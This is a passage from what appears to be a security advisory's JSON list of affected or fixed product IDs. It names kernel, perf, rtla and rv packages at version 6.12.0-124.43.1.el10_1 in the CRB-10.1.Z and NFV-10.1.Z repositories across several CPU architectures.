"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
